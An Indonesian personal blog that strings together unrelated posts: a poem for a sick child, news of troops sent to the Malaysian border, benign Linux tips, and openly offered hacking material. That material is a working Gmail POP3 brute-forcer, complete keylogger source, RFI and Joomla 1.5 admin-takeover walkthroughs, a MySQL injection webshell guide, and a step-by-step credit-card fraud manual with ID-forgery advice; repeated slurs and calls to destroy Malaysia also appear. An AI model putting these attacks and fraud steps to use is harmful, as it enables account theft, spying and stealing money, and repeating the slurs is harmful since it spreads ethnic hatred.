For You Dira

Tak terasa 1,2 tahun sudah berlalu, kau kini tumbuh seiringan dengan jalan nya waktu.
Dengan pertumbuhan mu, kami merasakan ada yang beda, dari yang biasa hingga yang luar biasa kau ciptakan alunan-alunan yang membuat kami tertawa.
Teringat kembali saat kau terlahir di dunia,saat itu kami berkata apa yang kami rasa I Love You Full, & kami mulai memikirkan nama yang bagus untuk mu.
Andai engkau tau besar rasa cinta ini hingga nafas terakhir kau selalu ada di hati.
Selalu di hati & tak akan pernah terganti, hati nurani kami ini akan tetap utuh karna kau lah yang terindah untuk kami.
kau tercipta hanya untuk kami, kami ingin kan kau selalu berada di pelukan kami, walau lelah kaki melangkah untuk menghidupi mu, walau tercucur keringat untuk memberaskan mu, tapi berikan kami kesempatan untuk bahagiakan mu di hari depan.


Kini kau tergeletak lemas di mana kami mulai cemas memikirkan diri mu.
Kami sangat merindukan tawa,tangis & canda mu di mana di hari-hari mu kau selalu memberikan kami motifasi & memberikan kami senyuman dengan tingkah-tingkah mungil mu.
Kami ingin kau cepat kembali kepelukan kami.
Kami ingin kau cepat sembuh & bisa memberikan kami senyuman & canda mu.
Kami selalu berdoa untuk kesehatan mu,agar kau bisa lepas dari jerat penyakit yang ada dalam tubuh mu.

We Are Love You Dira
.:: † ::. FROM .:: † ::.
.:: † ::. BLOGGER .:: † ::.



Bendera Pictures, Images and Photos



.:: † ::. FUCK MALAYSIA .:: † ::.
.:: † ::. JUST FOR MALAYSIA .:: † ::.















.:: † ::. I HATE MALAYSIA .:: † ::.

.:: † ::. SO WHAT ?? .:: † ::.

SBY Kirim 1 Batalyon Ke Perbatasan !


Bendera Pictures, Images and Photos


Sesaat sebelum pidato politik Presiden SBY Rabu kemarin, ternyata TNI telah mengirim satu batalion ke perbatasan Indonesia-Malaysia di Kalimantan. Pengiriman ini lebih cepat dari yang direncanakan sebelumnya yaitu pascalebaran.


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmC9a_cww2SKIjC8_qk4BTEH7KGpmCFBu8sEBkltDAHir97ro2Jy68sFNf2qy-mz7EBeL-vedi9dq1XecCAd2b9xR6i62gffFf3vPwzE8i9S7UjOyWMGewqontniXeZbS3NpS5Y3PN3RM/s1600/sby-785801.jpeg

Sebanyak satu batalion sekitar 700-1000 personel telah dikirim untuk bertugas mengamankan perbatasan Indonesia-Malaysia.

Komandan Brigade Infanteri 19/Khatulistiwa, Letk ol Inf Rochadi, melepas satu batalion plus 641 Beruang untuk menempati 31 pos di perbatasan.

"Rencananya penugasan ini pasca lebaran. Karena berbagai dinamika dan lain hal, kita berangkatkan sekarang. Ini perintah dari Mabes T NI," jelas Rochadi, kepada Tribun Pontianak, Rabu (1/9).
Para personil tersebut menempati 31 pos yang ada di perbatasan, diantanya, Entikong, Kabupaten Sanggau, Tanjung Datuk, Badau, Sajingan, Bengkayang, Sambas dan daerah lain yang berbatasan langsung dengan Malaysia.

"Ini tugas mulia, prajurit harus bangga mengemban amanah ini, ini bentuk pengabdian kepada Nusa dan Bangsa, jangan kecil hati, kalau kecil hati, lebih baik mundur dari prajurit, kalau sudah tugas, besok lebaran, sekarang ditugaskan, harus berangkat," tegas Rochadi lagi.
Rochadi juga meminta kepada para istri prajurit untuk mendukung sepenuhnya para suami yang bertugas dan senantiasa berdoa terhadap keselamatan para prajurit.

Batalion ini akan menggantikan Batalion 642 S intang, yang sebelumnya ditugaskan diperbatasan Republik Indonesia - Malaysia.



FUCK M ALAYSIA


NEGARA PLAGIAT !!!


MALAYSIA MUKA BABI



HANCURKAN MALAYSIA !!!!!

Gmail Brutusforce

#!usr/bin/python

#Gmail Pop3 Brute Forcer

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print “\n\t Xr0b0t[at]gmail[dot]com Gmail PopBruteForcer Beta v1.0″
print “\t ————————————————–\n”
print “\t Usage: ./gmail.py \n”
sys.exit(1)

server = “pop.gmail.com”
success = []

try:
users = open(sys.argv[1], “r”).readlines()
except(IOError):
print “[-] Error: Check your userlist path\n”
sys.exit(1)

try:
words = open(sys.argv[2], “r”).readlines()
except(IOError):
print “[-] Error: Check your wordlist path\n”
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = “No Response”
pass

print “\n\t Xr0b0t[at]gmail[dot]com Gmail PopBruteForcer Beta v1.0″
print “\t ————————————————–\n”
print “[+] Server:”,server
print “[+] Port: 995″
print “[+] Users Loaded:”,ls(users)
print “[+] Words Loaded:”,ls(words)
print “[+] Server response:”,welcome,”\n”

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if ls(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print “\n[-] Reloading Wordlist – Changing User\n”
reloader()
value = random.sample(words, 1)
users.remove(users[0])

lock.release()
if ls(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):
value, user = getword()

try:
print “-”*30
print “[+] User:”,user,”Password:”,value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print “\t\t\n\nLogin successful:”,user, value
print “\t\tMail:”,pop.stat()[0],”emails”
print “\t\tSize:”,pop.stat()[1],”bytes\n\n”
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print “An error occurred:”, msg
pass

for i in range(ls(words)*ls(users)):
work = Worker()
work.start()
time.sleep(1)
if ls(success) >=1:
print “\n\n[+] Mlebu cak:”,success[0], success[1]
print “\t[+] Mail:”,success[2],”emails”
print “\t[+] Size:”,success[3],”bytes\n”
print “\n[-] Mari\n”

[C]GetRawInputData() keylogger

Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level.


#define _WIN32_WINNT 0x0501
#include windows.h

// Definitions
int LogKey(HANDLE hLog, UINT vKey);
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow);

// Globals
const char g_szClassName[] = "klgClass";

// Window procedure of our message-only window
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
static HANDLE hLog;
UINT dwSize;
RAWINPUTDEVICE rid;
RAWINPUT *buffer;

switch(msg)
{
case WM_CREATE:
// Register a raw input device to capture keyboard input
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hwnd;

if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE)))
{
MessageBox(NULL, "Registering raw input device failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}

// open log.txt
hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if(hLog == INVALID_HANDLE_VALUE)
{
MessageBox(NULL, "Creating log.txt failed!", "Error",
MB_ICONEXCLAMATION|MB_OK);
return -1;
}

// append
SetFilePointer(hLog, 0, NULL, FILE_END);
break;

case WM_INPUT:
// request size of the raw input buffer to dwSize
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize,
sizeof(RAWINPUTHEADER));

// allocate buffer for input data
buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);

if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize,
sizeof(RAWINPUTHEADER)))
{
// if this is keyboard message and WM_KEYDOWN, log the key
if(buffer->header.dwType == RIM_TYPEKEYBOARD
&& buffer->data.keyboard.Message == WM_KEYDOWN)
{
if(LogKey(hLog, buffer->data.keyboard.VKey) == -1)
DestroyWindow(hwnd);
}
}

// free the buffer
HeapFree(GetProcessHeap(), 0, buffer);
break;

case WM_DESTROY:
if(hLog != INVALID_HANDLE_VALUE)
CloseHandle(hLog);
PostQuitMessage(0);
break;

default:
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow)
{
WNDCLASSEX wc;
HWND hwnd;
MSG msg;

// register window class
ZeroMemory(&wc, sizeof(WNDCLASSEX));
wc.cbSize = sizeof(WNDCLASSEX);
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = g_szClassName;

if(!RegisterClassEx(&wc))
{
MessageBox(NULL, "Window Registration Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}

// create message-only window
hwnd = CreateWindowEx(
0,
g_szClassName,
NULL,
0,
0, 0, 0, 0,
HWND_MESSAGE, NULL, hInstance, NULL
);

if(!hwnd)
{
MessageBox(NULL, "Window Creation Failed!", "Error!",
MB_ICONEXCLAMATION|MB_OK);
return 0;
}

// the message loop
while(GetMessage(&msg, NULL, 0, 0) > 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}

return msg.wParam;
}

int LogKey(HANDLE hLog, UINT vKey)
{
DWORD dwWritten;
BYTE lpKeyboard[256];
char szKey[32];
WORD wKey;
char buf[32];
int len;

// Convert virtual-key to ascii
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
GetKeyboardState(lpKeyboard);

len = 0;
switch(vKey)
{
case VK_BACK:
len = wsprintf(buf, "[BP]");
break;
case VK_RETURN:
len = 2;
strcpy(buf, "\r\n");
break;
case VK_SHIFT:
break;
default:
if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1)
len = wsprintf(buf, "%c", (char)wKey);
else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0)
len = wsprintf(buf, "[%s]", szKey);
break;
}

// Write buf into the log
if(len > 0)
{
if(!WriteFile(hLog, buf, len, &dwWritten, NULL))
return -1;
}

return 0;
}

RFI turorial

Original Post By syaitonnirrojim
[+] sedikit tutorial bagaimana mendeteksi sebuah RFI vulnerabilty di dalam suatu CMS /php scripts

[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita bisa melakukan require melalui injector //

[+] ok permisalan
1. misal file : function.php
2 di dalam source code funtion.php berisi scripts seperti

Code:

if(!$root['Path']){$root['Path'] = "./";}
include($root['Path']."config/config.php");

3. apabila dalam function.php gagal meng query / error di line XxX
kita dapat memasukkan injektor ..
4. dan code nya adalah :

Code:

http://127.0.0.1/path/function.php?root[Path]=

5. lalu tambahkan suatu injektor .. dan menjadi ..

Code:

http://127.0.0.1/path/function.php?root[Path]=http://127.0.0.1/injektor.txt

6. see what ? u got vuln woth RFI …
[+] sekedar tutorial dari saya .. mohon maaf apa bila ada salah / kekurangan dalam tutor ini ..
[+] ./e0f
[+] By masterhacked ~ original no copy paste ..

Backup dan Restoring Linux

langsung aja

cara merestor dan backup ubuntu

pertama tapa

kamu masuk root dulu

sudo -i atau sudo su

langsung menuju root directory

cd /

kemudian tulis command ini

tar cvpzf backup.tgz –exclude=/proc –exclude=/lost+found –exclude=/backup.tgz –exclude=/mnt –exclude=/sys /

itu untuk backup data kamu dll di ubuntu

kemudian untuk restor adalah sebagai berikut

tar xvpfz backup.tgz -C /

nah dari situ akan muncul hasilnya yank berbentuk

mkdir proc

mkdir lost+found

mkdir mnt

mkdir sys

etc…

Backup dan Restoring Linux

langsung aja

cara merestor dan backup ubuntu

pertama tapa

kamu masuk root dulu

sudo -i atau sudo su

langsung menuju root directory

cd /

kemudian tulis command ini

tar cvpzf backup.tgz –exclude=/proc –exclude=/lost+found –exclude=/backup.tgz –exclude=/mnt –exclude=/sys /

itu untuk backup data kamu dll di ubuntu

kemudian untuk restor adalah sebagai berikut

tar xvpfz backup.tgz -C /

nah dari situ akan muncul hasilnya yank berbentuk

mkdir proc

mkdir lost+found

mkdir mnt

mkdir sys

etc…

cara install linux dengan usb

Selain Windows, sistem operasi Linux juga bisa dijalankan dari sebuah USB (flash disk).


Hanya dalam 5 menit, Anda dapat menginstal Linux dari USB.


Anda bisa menggunakan tools bernama UNetbootin.


Untuk bisa menginstal Linux dari flash disk,
Anda wajib memiliki flash disk berkapasitas meinimal 1GB.


Selain USB,
pastikan Anda telah menentukan distribusi Linux yang diinginkan, yaitu:


Arch linux, BackTrack, CentOS, CloneZilla, Damn Small Linux, Debian,
Dream Linux, Elive, FaunOS, Fedora, Frugalware, Gentoo, Gujin,
Kubuntu, Linux Mint, Mandriva, netBSD, NTPasswr, openSUSE,
Ophcrack, Parted Magic, PClinuxOS, Puppy Linux, Slax, SliTaZ, Smart
Boot Manager, Super Grub Disk, Ubuntu, Xubunu, Zenwalk.


Sebagai contoh, instalasi kali ini menggunakan distro Linux BackTrack 3 dan Ubuntu 8.04.1 LTS, dengan USB Kingstone DataTraveler 2.0 1GB. Berikut langkah-langkah instalasinya, seperti dikutip detikINET dari





1. Download UNetbootin, simpan pada desktop.


2. Klik kanan UNetbootin pada desktop, lalu pilih Properties.


3. Klik tab Permissions, beri tanda centang (v) pada kotak ‘Allow executing file as program’, lalu klik tombol Close.


4. Tancapkan terlebih dulu USB ke port komputer. Ini sangat penting karena Anda tidak akan bisa menggunakan USB jika menancapkannya setelah Anda membuka aplikasi UNetbootin.


5. Selanjutnya, klik dua kali file exe UNetbootin yang sudah di-download tadi, lalu ketikkan password hingga aplikasi UNetbootin terbuka.


6. Pilih distribusi dan versi Linux yang Anda inginkan, lalu pilih tipe instalasi dan klik Ok untuk memulai instalasi.


Selesai! Reboot komputer Anda dan booting-lah dari USB. Kini Anda dapat menggunakan sistem operasi Linux portabel Anda.


untuk download softwrare x cari ndiri linknya ya

CARDING

bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....

...:::Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada www.internic.org/regist.html Atau dpt juga membeli software - software murah di situs - situs penjual software:::...

...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2008):::...

...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...

...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...

...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...

...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...

...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...

...:::Jika anda tinggal di Propinsi Surabaya, sebaiknya alamat pengiriman barang jgn dikirim ke Kota BONEK tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Surabaya menduduki peringkat ke-2 setelah Yogyakarta dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...

...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...

...::alam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...

...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...

...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran (cash on delivery (pembayaran dilakukan di alamat tujuan). Tapi, bila metode seperti itu yg anda pilih, maka biasanya pihak online shop akan menanyakan (mengirim e-mail konfirmasi) lagi, "....apakah barang tersebut benar - benar mau dikirim ?" Solusinya : anda reply e-mailnya, dan katakan anda tidak jadi memesan, karena besok anda harus berangkat ke Singapura atau Hongkong, etc. untuk urusan kantor:::...

...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...

...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...

...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...

...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...

...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...

...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...

...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...

...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...

...:::Pelajari teknik hacking/cracking step by step:::...

...:::Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...





....:Alternatif Lainnya:....





- GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI www.stayinvisible.com)
GANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI www.wallet.yahoo.com
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account www.ebay.com EBAY
- lalu mengecek keberadaan uangnya di www.ibs-authorization.com NGECEK ISI CC DAN
INFORMASI CC
- setelah ada uangnya. buatlah account www.paypal.com PAYPAL dengan cara subscription
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di www.ebay.com
- setelah ada barang yang dibayar, maka bayarlah dengan account di www.paypal.com PAYPAL
ACCOUNT

TIPS DAN TEKNIK :
- SITUS www.wallet.yahoo.com ( type security rendah = asal CCnya bukan USA )
- situs www.ebay.com ( type security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
- www.ibs-authorization.com CHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti
proxy dan sangat ketat )
jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
- www.paypal.com (type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya
bisa dipakai)
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
JADI ngecek di www.ibs-authorization.com sifatnya wajib dan bikin account dipaypal sifatnya tidak
wajib karena ada metode
lainnya yaitu account di bidpay
Page 1 of TUTORIAL CARDING 2
http://users.cjb.net/teknik-carding/ 6/14/2005
tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate
setelah lolos www.wallet.yahoo.com check apakah ada uangnya tidak di www.ibs-authorization.com
jika sudah ada. maka pada penjual barang untuk dibayar lewat www.bidpay.com
- tingkat security www.bidpay.com lebih rendah dibandingkan www.paypal.com
tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya
sebagai kado atau hadiah untuk
saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim
dengan settingan hargapenjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket
dibawah 5 juta =)

Hack Joomla




Ha Ha Ha


mungkin tutor ini udah ada di benak anda..

tapi mohon maaf tutor ini hanya untuk teman² yang masih mencari cara mudah untuk hack joomla..

so buat yang udah tau tolong di bantu buat temen² kita yang masih blum tau & tolong jika saya salah nulis tutor atau ntah ada yang kurang mohon di kasi tau karna saling berbagi itu terasa indah..


ok kita langsung aja ke tutor nya :


Ini Adalah tutor Hack Joomla 1.5.0 dan 1.5.5


1. Cari target situs yang akan di hack, bisa search by google dengan keyword situs joomla 1.5.0 setelah ketemu cari target yang tepat contoh www.target.com


2. buka : www.target.com/index.php?option=com_user&view=reset&layout=confirm


3. Masukkan karakter : ' pada kolom token


4. Isi Password baru


5. Buka : www.target.com/administrator/


6. Login admin dengan password anda


nah bagi teman² semua pemilik situs yang masih menggunakan Joomla 1.5.0 dan 1.5.5 dengan Username default ADMIN harap segera update, mengingat mudah sekali di hack



Ha Ha Ha


Sorry Klu Ada Yang Salah


Oh Iya Ada Yang Ketinggalan..


HARAP JANGAN DISALAH GUNAKAN
::)


::) ::) ITU CARA BUAT KITA BIAR BERHATI-HATI, JADI WASPADALAH....!!! :-* :-* :-*

Backdoor webserver using MySQL SQL Injection

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"


Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell


Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):


For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

